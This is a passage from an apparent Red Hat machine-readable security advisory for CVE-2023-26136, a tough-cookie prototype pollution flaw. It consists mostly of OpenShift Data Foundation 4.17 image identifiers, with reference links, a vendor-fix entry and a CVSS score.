"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2219310", }, ], notes: [ { category: "description", text: "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.", title: "Vulnerability description", }, { category: "summary", text: "tough-cookie: prototype pollution in cookie memstore", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2023-26136", }, { category: "external", summary: "RHBZ#2219310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2219310", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2023-26136", url: "https://www.cve.org/CVERecord?id=CVE-2023-26136", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", url: "https://nvd.nist.gov/vuln/detail/CVE-2023-26136", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", url: "https://github.com/salesforce/tough-cookie/commit/12d474791bb856004e858fdb1c47b7608d09cf6e", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/issues/282", url: "https://github.com/salesforce/tough-cookie/issues/282", }, { category: "external", summary: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", url: "https://github.com/salesforce/tough-cookie/releases/tag/v4.1.3", }, { category: "external", summary: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", url: "https://lists.debian.org/debian-lts-announce/2023/07/msg00010.html", }, { category: "external", summary: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", url: "https://security.snyk.io/vuln/SNYK-JS-TOUGHCOOKIE-5672873", }, ], release_date: "2023-07-01T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", 